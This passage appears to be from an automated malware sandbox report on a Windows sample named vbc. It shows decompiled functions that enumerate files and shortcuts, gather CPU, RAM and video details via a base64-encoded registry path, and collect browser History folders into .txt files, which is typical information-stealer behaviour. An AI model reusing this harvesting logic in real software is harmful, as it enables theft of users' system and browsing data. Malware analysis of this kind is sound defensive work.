								if(_v648.nFileSizeHigh != 0) {
									goto L21;
								}
								_push(0);
								_push(_v648.nFileSizeLow >> 0xa);
								_t428 = _a16;
								asm("cdq");
								__eflags = 0 - _v56;
								if(__eflags != 0) {
									if(__eflags < 0) {
										goto L21;
									}
									L15:
									_t458 = E004045EC(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L21;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040377C( &_v684, _v36);
										_t474 = 0;
										__eflags = E00406120(_v684, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(_t458 != 0) {
											continue;
										}
										goto L21;
									}
									E0040781C(_v8, _t458,  &_v688, __eflags);
									E00403BE0( &_v8, _v688);
									E0040781C(_v32, _t458,  &_v48, __eflags);
									_t474 = E00403D4C(_v8);
									E00403F34( &_v48, _t443, 1, __eflags);
									_push(_v16);
									_push(0x414c4c);
									_push(_v48);
									E00403E1C();
									E0040781C(_v700, _t458,  &_v696, __eflags);
									E0040377C( &_v692, _v696);
									_push(_v692);
									E0040781C(_v32, _t458,  &_v704, __eflags);
									_pop(_t570);
									E0040DDB0(_v704, _t458, _t570, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t456 =  *0x41b638; // 0x41b0ac
										 *_t456 =  *_t456 + 1;
									}
									goto L21;
								}
								__eflags = _t428 -  *_t579;
								if(_t428 <  *_t579) {
									goto L21;
								}
								goto L15;
								L43:
								_t333 = FindNextFileW(_t573,  &_v648);
								__eflags = _t333;
							} while (_t333 != 0);
							FindClose(_t573);
							continue;
						}
						__eflags = _t301 -  *_t471;
						if(_t301 >  *_t471) {
							goto L8;
						} else {
							goto L46;
						}
					}
					goto L46;
				}
			}




















































































                                                                                                    0x00414408
                                                                                                    0x00414408
                                                                                                    0x00414409
                                                                                                    0x0041440b
                                                                                                    0x0041440c
                                                                                                    0x00414411
                                                                                                    0x00414411
                                                                                                    0x00414413
                                                                                                    0x00414415
                                                                                                    0x00414415
                                                                                                    0x00414415
                                                                                                    0x00414418
                                                                                                    0x00414418
                                                                                                    0x0041441b
                                                                                                    0x0041441c
                                                                                                    0x0041441d
                                                                                                    0x0041441e
                                                                                                    0x00414421
                                                                                                    0x00414424
                                                                                                    0x0041442a
                                                                                                    0x00414432
                                                                                                    0x0041443a
                                                                                                    0x00414442
                                                                                                    0x00414449
                                                                                                    0x0041444a
                                                                                                    0x0041444f
                                                                                                    0x00414452
                                                                                                    0x00414457
                                                                                                    0x00414463
                                                                                                    0x00414471
                                                                                                    0x0041447f
                                                                                                    0x00414492
                                                                                                    0x004144a0
                                                                                                    0x004144b3
                                                                                                    0x004144bb
                                                                                                    0x004144c0
                                                                                                    0x004144c2
                                                                                                    0x00414ad9
                                                                                                    0x00414adb
                                                                                                    0x00414ade
                                                                                                    0x00414ae1
                                                                                                    0x00414af1
                                                                                                    0x00414b01
                                                                                                    0x00414b0c
                                                                                                    0x00414b1c
                                                                                                    0x00414b2c
                                                                                                    0x00414b37
                                                                                                    0x00414b47
                                                                                                    0x00414b57
                                                                                                    0x00414b67
                                                                                                    0x00414b72
                                                                                                    0x00414b7d
                                                                                                    0x00414b88
                                                                                                    0x00414b98
                                                                                                    0x00414ba8
                                                                                                    0x00414bb3
                                                                                                    0x00414bbb
                                                                                                    0x00414bc1
                                                                                                    0x00414bc9
                                                                                                    0x00414bd1
                                                                                                    0x00414bd7
                                                                                                    0x00414be4
                                                                                                    0x00414bec
                                                                                                    0x00414bf2
                                                                                                    0x00414bff
                                                                                                    0x00414c04
                                                                                                    0x00414c0c
                                                                                                    0x004144c8
                                                                                                    0x004144d1
                                                                                                    0x004144e0
                                                                                                    0x004144e5
                                                                                                    0x004144f7
                                                                                                    0x00414501
                                                                                                    0x0041450c
                                                                                                    0x0041450d
                                                                                                    0x00414ac9
                                                                                                    0x00414517
                                                                                                    0x0041451c
                                                                                                    0x00414521
                                                                                                    0x00414526
                                                                                                    0x00414529
                                                                                                    0x0041452f
                                                                                                    0x0041452f
                                                                                                    0x00414532
                                                                                                    0x0041453d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00414543
                                                                                                    0x00414555
                                                                                                    0x00414569
                                                                                                    0x00414576
                                                                                                    0x00414576
                                                                                                    0x00414577
                                                                                                    0x00414586
                                                                                                    0x0041458b
                                                                                                    0x004145a3
                                                                                                    0x004145b4
                                                                                                    0x004145ca
                                                                                                    0x004145cc
                                                                                                    0x004145cc
                                                                                                    0x004145cf
                                                                                                    0x004145e0
                                                                                                    0x004145e5
                                                                                                    0x004145ea
                                                                                                    0x004145fb
                                                                                                    0x00414609
                                                                                                    0x00414614
                                                                                                    0x00414622
                                                                                                    0x00414625
                                                                                                    0x00414759
                                                                                                    0x00414759
                                                                                                    0x0041475d
                                                                                                    0x00414912
                                                                                                    0x00414912
                                                                                                    0x00414916
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041492d
                                                                                                    0x0041493d
                                                                                                    0x00414942
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00414959
                                                                                                    0x00414969
                                                                                                    0x0041496e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00414974
                                                                                                    0x0041497f
                                                                                                    0x00414982
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041498d
                                                                                                    0x00414992
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004149a1
                                                                                                    0x004149b2
                                                                                                    0x004149b7
                                                                                                    0x004149ba
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004149c0
                                                                                                    0x004149ce
                                                                                                    0x004149cf
                                                                                                    0x004149d1
                                                                                                    0x00414a71
                                                                                                    0x00414a71
                                                                                                    0x00414a75
                                                                                                    0x00414a7f
                                                                                                    0x00414a7f
                                                                                                    0x00414a80
                                                                                                    0x00414a8f
                                                                                                    0x00414a94
                                                                                                    0x00414aa9
                                                                                                    0x00414aa9
                                                                                                    0x00000000
                                                                                                    0x00414a75
                                                                                                    0x004149d7
                                                                                                    0x004149d8
                                                                                                    0x004149d8
                                                                                                    0x004149da
                                                                                                    0x004149e3
                                                                                                    0x004149f4
                                                                                                    0x00414a05
                                                                                                    0x00414a10
                                                                                                    0x00414a1d
                                                                                                    0x00414a2e
                                                                                                    0x00414a3f
                                                                                                    0x00414a50
                                                                                                    0x00414a5b
                                                                                                    0x00414a5c
                                                                                                    0x00414a61
                                                                                                    0x00414a63
                                                                                                    0x00414a65
                                                                                                    0x00414a65
                                                                                                    0x00414a69
                                                                                                    0x00414a6a
                                                                                                    0x00414a6a
                                                                                                    0x00414a6a
                                                                                                    0x00000000
                                                                                                    0x004149da
                                                                                                    0x0041476c
                                                                                                    0x0041477d
                                                                                                    0x0041478d
                                                                                                    0x00414792
                                                                                                    0x00414794
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004147a0
                                                                                                    0x004147a8
                                                                                                    0x004147ad
                                                                                                    0x004147b0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004147c0
                                                                                                    0x004147c1
                                                                                                    0x004147c3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004147c9
                                                                                                    0x004147ca
                                                                                                    0x004147ca
                                                                                                    0x004147cc
                                                                                                    0x004147d5
                                                                                                    0x004147e6
                                                                                                    0x004147f7
                                                                                                    0x004147fe
                                                                                                    0x00414800
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041490a
                                                                                                    0x0041490b
                                                                                                    0x0041490b
                                                                                                    0x0041490c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0041490c
                                                                                                    0x0041480f
                                                                                                    0x0041481d
                                                                                                    0x0041482b
                                                                                                    0x00414839
                                                                                                    0x00414847
                                                                                                    0x00414855
                                                                                                    0x0041485a
                                                                                                    0x0041485d
                                                                                                    0x0041486b
                                                                                                    0x00414870
                                                                                                    0x0041487e
                                                                                                    0x00414895
                                                                                                    0x0041489a
                                                                                                    0x0041489d
                                                                                                    0x004148a2
                                                                                                    0x004148b0
                                                                                                    0x004148c1
                                                                                                    0x004148d2
                                                                                                    0x004148dd
                                                                                                    0x004148e7
                                                                                                    0x004148f2
                                                                                                    0x004148f3
                                                                                                    0x004148f8
                                                                                                    0x004148fb
                                                                                                    0x004148ff
                                                                                                    0x00414901
                                                                                                    0x00414906
                                                                                                    0x00414906
                                                                                                    0x00000000
                                                                                                    0x004148ff
                                                                                                    0x0041462b
                                                                                                    0x00414632
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00414643
                                                                                                    0x00414644
                                                                                                    0x00414645
                                                                                                    0x00414648
                                                                                                    0x00414649
                                                                                                    0x0041464d
                                                                                                    0x0041465e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00414664
                                                                                                    0x0041466e
                                                                                                    0x0041466f
                                                                                                    0x00414671
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00414677
                                                                                                    0x00414678
                                                                                                    0x00414678
                                                                                                    0x0041467a
                                                                                                    0x00414683
                                                                                                    0x00414694
                                                                                                    0x0041469b
                                                                                                    0x0041469d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00414751
                                                                                                    0x00414752
                                                                                                    0x00414752
                                                                                                    0x00414753
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00414753
                                                                                                    0x004146ac
                                                                                                    0x004146ba
                                                                                                    0x004146c5
                                                                                                    0x004146d2
                                                                                                    0x004146dc
                                                                                                    0x004146e1
                                                                                                    0x004146e4
                                                                                                    0x004146e9
                                                                                                    0x004146f7
                                                                                                    0x00414708
                                                                                                    0x00414719
                                                                                                    0x00414724
                                                                                                    0x0041472e
                                                                                                    0x00414739
                                                                                                    0x0041473a
                                                                                                    0x0041473f
                                                                                                    0x00414742
                                                                                                    0x00414746
                                                                                                    0x00414748
                                                                                                    0x0041474d
                                                                                                    0x0041474d
                                                                                                    0x00000000
                                                                                                    0x00414746
                                                                                                    0x0041464f
                                                                                                    0x00414654
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00414aae
                                                                                                    0x00414ab6
                                                                                                    0x00414abb
                                                                                                    0x00414abb
                                                                                                    0x00414ac4
                                                                                                    0x00000000
                                                                                                    0x00414ac4
                                                                                                    0x00414534
                                                                                                    0x00414536
                                                                                                    0x00000000
                                                                                                    0x00414538
                                                                                                    0x00000000
                                                                                                    0x00414538
                                                                                                    0x00414536
                                                                                                    0x00000000
                                                                                                    0x00414ac9

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeString$FileFindFirst
                                                                                                    • String ID: .LNK$._.$0_@$LLA$CA
                                                                                                    • API String ID: 1653790112-882170572
                                                                                                    • Opcode ID: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                    • Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
                                                                                                    • Opcode Fuzzy Hash: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                    • Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416740 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 47%
                                                                                                    			E00416740(intOrPtr* __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t39;
				signed int _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t113;
				void* _t117;
				intOrPtr _t120;
				intOrPtr _t121;

				_t118 = __esi;
				_t38 = __eax +  *__eax;
				 *_t38 =  *_t38 + _t38;
				_t39 = _t38 | 0x5500000a;
				_t120 = _t121;
				_t93 = 0xb;
				do {
					_push(0);
					_push(0);
					_t93 = _t93 - 1;
					_t124 = _t93;
				} while (_t93 != 0);
				_t92 = _t39;
				_push(_t120);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t92);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t92,  &_v60, _t117, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t92,  &_v68, _t117, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t94);
				E00407500(0x80000002, _t92, _t94, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t92, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t92);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t92,  &_v84, __esi, _t124);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t92, _v72);
				_push( *_t92);
				_push("GetRAM: ");
				E00416584( &_v88, _t92, _t118, _t124);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t92);
				_push("Video Info\r\n");
				E00416644( &_v92, _t92, _t117, _t118);
				_push(_v92);
				E00403850();
				_t113 = 0x4169ac;
				 *[fs:eax] = _t113;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}


























                                                                                                    0x00416740
                                                                                                    0x00416740
                                                                                                    0x00416742
                                                                                                    0x00416744
                                                                                                    0x00416749
                                                                                                    0x0041674b
                                                                                                    0x00416750
                                                                                                    0x00416750
                                                                                                    0x00416752
                                                                                                    0x00416754
                                                                                                    0x00416754
                                                                                                    0x00416754
                                                                                                    0x00416758
                                                                                                    0x0041675c
                                                                                                    0x0041675d
                                                                                                    0x00416762
                                                                                                    0x00416765
                                                                                                    0x0041676c
                                                                                                    0x00416776
                                                                                                    0x0041677b
                                                                                                    0x0041677e
                                                                                                    0x00416783
                                                                                                    0x00416788
                                                                                                    0x00416791
                                                                                                    0x0041679c
                                                                                                    0x004167a4
                                                                                                    0x004167ad
                                                                                                    0x004167b8
                                                                                                    0x004167c5
                                                                                                    0x004167c6
                                                                                                    0x004167cb
                                                                                                    0x004167ce
                                                                                                    0x004167db
                                                                                                    0x004167e5
                                                                                                    0x004167f4
                                                                                                    0x004167ff
                                                                                                    0x00416804
                                                                                                    0x0041680d
                                                                                                    0x00416812
                                                                                                    0x00416815
                                                                                                    0x00416822
                                                                                                    0x0041682c
                                                                                                    0x00416831
                                                                                                    0x00416833
                                                                                                    0x0041683b
                                                                                                    0x00416840
                                                                                                    0x00416843
                                                                                                    0x0041684f
                                                                                                    0x00416854
                                                                                                    0x00416856
                                                                                                    0x0041685e
                                                                                                    0x00416863
                                                                                                    0x00416872
                                                                                                    0x00416879
                                                                                                    0x0041687c
                                                                                                    0x0041687f
                                                                                                    0x0041688c
                                                                                                    0x00416894
                                                                                                    0x0041689c
                                                                                                    0x004168a9
                                                                                                    0x004168b1
                                                                                                    0x004168b9
                                                                                                    0x004168c1
                                                                                                    0x004168d3

                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                      • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeString$InfoSystem
                                                                                                    • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                    • API String ID: 4070941872-1038824218
                                                                                                    • Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                    • Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
                                                                                                    • Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                    • Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404C15 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00404C15(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x41c5a4)) =  *((intOrPtr*)(__eax - 0x41c5a4)) + __eax - 0x41c5a4;
				 *0x41b00c = 2;
				 *0x41c010 = 0x4010b8;
				 *0x41c014 = 0x4010c0;
				 *0x41c036 = 2;
				 *0x41c000 = E00404568;
				if(E00402A94() != 0) {
					_t3 = E00402AC4();
				}
				E00402B88(_t3);
				 *0x41c03c = 0xd7b0;
				 *0x41c208 = 0xd7b0;
				 *0x41c3d4 = 0xd7b0;
				 *0x41c02c = GetCommandLineA();
				 *0x41c028 = E00401180();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x41c5a8 = E00404B4C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x41c5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x41c020 = _t11;
				return _t11;
			}





                                                                                                    0x00404c15
                                                                                                    0x00404c1a
                                                                                                    0x00404c1f
                                                                                                    0x00404c21
                                                                                                    0x00404c28
                                                                                                    0x00404c32
                                                                                                    0x00404c3c
                                                                                                    0x00404c43
                                                                                                    0x00404c54
                                                                                                    0x00404c56
                                                                                                    0x00404c56
                                                                                                    0x00404c5b
                                                                                                    0x00404c60
                                                                                                    0x00404c69
                                                                                                    0x00404c72
                                                                                                    0x00404c80
                                                                                                    0x00404c8a
                                                                                                    0x00404c9e
                                                                                                    0x00404cd7
                                                                                                    0x00404ca0
                                                                                                    0x00404cae
                                                                                                    0x00404cc6
                                                                                                    0x00404cb0
                                                                                                    0x00404cb0
                                                                                                    0x00404cb0
                                                                                                    0x00404cae
                                                                                                    0x00404cdc
                                                                                                    0x00404ce1
                                                                                                    0x00404ce6

                                                                                                    APIs
                                                                                                      • Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402A99
                                                                                                      • Part of subcall function 00402A94: GetKeyboardType.USER32 ref: 00402AA5
                                                                                                    • GetCommandLineA.KERNEL32 ref: 00404C7B
                                                                                                    • GetVersion.KERNEL32 ref: 00404C8F
                                                                                                    • GetVersion.KERNEL32 ref: 00404CA0
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00404CDC
                                                                                                      • Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                      • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32 ref: 00402B19
                                                                                                      • Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?), ref: 00402B2F
                                                                                                    • GetThreadLocale.KERNEL32 ref: 00404CBC
                                                                                                      • Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                    • String ID: `+J
                                                                                                    • API String ID: 3734044017-1475299285
                                                                                                    • Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                    • Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
                                                                                                    • Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
                                                                                                    • Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412D70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 159fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 52%
                                                                                                    			E00412D70(signed int __eax, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				void* _v24;
				intOrPtr _v117;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				intOrPtr _v656;
				char _v660;
				signed int _t58;
				void* _t112;
				void* _t114;
				intOrPtr _t116;
				intOrPtr _t131;
				intOrPtr _t136;
				intOrPtr _t148;
				intOrPtr _t149;

				_t146 = __esi;
				_t145 = __edi;
				_pop(_t114);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				_pop(_t147);
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				_t58 = __eax | 0x00000a00;
				 *_t58 =  *_t58 + _t58;
				 *_t58 =  *_t58 + __ecx;
				 *_t58 =  *_t58 + _t58;
				 *0xd000a00 =  *0xd000a00 + __ecx;
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __ecx;
				 *_t58 =  *_t58 + _t58;
				 *_t58 =  *_t58 + _t58;
				_v117 = _v117 + __edx;
				_t148 = _t149;
				_push(__ecx);
				_t116 = 0x51;
				do {
					_push(0);
					_push(0);
					_t116 = _t116 - 1;
				} while (_t116 != 0);
				_push(_t116);
				_t7 =  &_v8;
				 *_t7 = _t116;
				_push(_t114);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t7;
				_v12 = __edx;
				_v8 = _t58;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t148);
				_push(0x412fe0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t149;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x413008);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x413008);
					E0040813C(0x61,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t114, 0x104) != 0) {
						_push(_t148);
						_push(0x412f54);
						_push( *[fs:eax]);
						 *[fs:eax] = _t149;
						if(_a4 == 0) {
							_push(_v8);
							_push(0x413008);
							E00403D10( &_v648, 0x104,  &(_v616.cFileName));
							_push(_v648);
							_push(L"\\History");
							E00403E1C();
							E004129A4(_v644, _t114,  &_v640, _t145, _t146);
							E0040377C( &_v636, _v640);
							_push(_v636);
							_push(_v16);
							_push(0x413008);
							_push(_v12);
							_push(0x413028);
							E00403D10( &_v660, 0x104,  &(_v616.cFileName));
							_push(_v660);
							_push(L".txt");
							E00403E1C();
							E0040377C( &_v652, _v656);
							_pop(_t112);
							E0040DCE8(_t112, _t114, _v652, _t145, _t146);
						}
						_pop(_t136);
						 *[fs:eax] = _t136;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t131);
				 *[fs:eax] = _t131;
				_push(E00412FE7);
				E00403B98( &_v660, 2);
				E004034E4( &_v652);
				E00403B98( &_v648, 3);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}




























                                                                                                    0x00412d70
                                                                                                    0x00412d70
                                                                                                    0x00412d70
                                                                                                    0x00412d71
                                                                                                    0x00412d73
                                                                                                    0x00412d76
                                                                                                    0x00412d78
                                                                                                    0x00412d79
                                                                                                    0x00412d7b
                                                                                                    0x00412d7d
                                                                                                    0x00412d7f
                                                                                                    0x00412d82
                                                                                                    0x00412d84
                                                                                                    0x00412d89
                                                                                                    0x00412d8b
                                                                                                    0x00412d8d
                                                                                                    0x00412d8f
                                                                                                    0x00412d95
                                                                                                    0x00412d97
                                                                                                    0x00412d99
                                                                                                    0x00412d9b
                                                                                                    0x00412d9d
                                                                                                    0x00412d9f
                                                                                                    0x00412da0
                                                                                                    0x00412da5
                                                                                                    0x00412da5
                                                                                                    0x00412da7
                                                                                                    0x00412da9
                                                                                                    0x00412da9
                                                                                                    0x00412dac
                                                                                                    0x00412dad
                                                                                                    0x00412dad
                                                                                                    0x00412db0
                                                                                                    0x00412db1
                                                                                                    0x00412db2
                                                                                                    0x00412db3
                                                                                                    0x00412db6
                                                                                                    0x00412db9
                                                                                                    0x00412dbf
                                                                                                    0x00412dc7
                                                                                                    0x00412dcf
                                                                                                    0x00412dd6
                                                                                                    0x00412dd7
                                                                                                    0x00412ddc
                                                                                                    0x00412ddf
                                                                                                    0x00412df7
                                                                                                    0x00412e0d
                                                                                                    0x00412e10
                                                                                                    0x00412e10
                                                                                                    0x00412e13
                                                                                                    0x00412e29
                                                                                                    0x00412e2e
                                                                                                    0x00412e34
                                                                                                    0x00412e44
                                                                                                    0x00412e49
                                                                                                    0x00412e5a
                                                                                                    0x00412e6c
                                                                                                    0x00412e74
                                                                                                    0x00412e75
                                                                                                    0x00412e7a
                                                                                                    0x00412e7d
                                                                                                    0x00412e84
                                                                                                    0x00412e8a
                                                                                                    0x00412e8d
                                                                                                    0x00412ea3
                                                                                                    0x00412ea8
                                                                                                    0x00412eae
                                                                                                    0x00412ebe
                                                                                                    0x00412ecf
                                                                                                    0x00412ee0
                                                                                                    0x00412eeb
                                                                                                    0x00412eec
                                                                                                    0x00412eef
                                                                                                    0x00412ef4
                                                                                                    0x00412ef7
                                                                                                    0x00412f0d
                                                                                                    0x00412f12
                                                                                                    0x00412f18
                                                                                                    0x00412f28
                                                                                                    0x00412f39
                                                                                                    0x00412f44
                                                                                                    0x00412f45
                                                                                                    0x00412f45
                                                                                                    0x00412f4c
                                                                                                    0x00412f4f
                                                                                                    0x00412f4f
                                                                                                    0x00412f6e
                                                                                                    0x00412f7a
                                                                                                    0x00412f81
                                                                                                    0x00412f84
                                                                                                    0x00412f87
                                                                                                    0x00412f97
                                                                                                    0x00412fa2
                                                                                                    0x00412fb2
                                                                                                    0x00412fbd
                                                                                                    0x00412fcd
                                                                                                    0x00412fdf

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID: .txt$\*.*$\History
